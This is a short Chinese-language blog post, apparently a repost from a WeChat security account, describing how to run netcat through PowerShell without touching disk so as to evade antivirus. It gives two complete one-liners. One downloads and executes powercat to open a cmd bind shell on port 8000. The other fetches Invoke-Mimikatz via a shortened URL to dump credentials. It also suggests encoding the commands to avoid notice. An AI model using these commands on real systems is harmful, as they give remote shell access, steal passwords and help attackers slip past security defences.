powershell运行netcat

admin 2022年4月1日11:23:03评论100 views字数 525阅读1分45秒阅读模式

前言


大家都知道,powershell可以做到在内存中加载运行文件,做到无文件在硬盘上生成。


正文


渗透中大家常用的技巧比如nc监听、mimikatz密码抓取等,今天给大家介绍下利用ps执行nc做到变相免杀。


ps版nc链接如下:


https://github.com/besimorhino/powercat


可以本地执行,也可以远程执行,远程执行命令如下:


powershell "IEX (New-Object System.Net.Webclient).DownloadString('https://raw.githubusercontent.com/besimorhino/powercat/master/powercat.ps1');powercat -l -p 8000 -e cmd"


powershell运行netcat


然后远程连接执行命令即可

powershell运行netcat


当然,如果嫌弃该命令太暴露,可以对其进行编码


powershell运行netcat


mimikatz密码抓取同理


powershell "IEX (New-Object Net.WebClient).DownloadString('http://is.gd/oeoFuI'); Invoke-Mimikatz -DumpCreds"


原文始发于微信公众号(中国白客联盟):powershell运行netcat

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2022年4月1日11:23:03
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   powershell运行netcathttp://cn-sec.com/archives/783546.html

发表评论

匿名网友 填写信息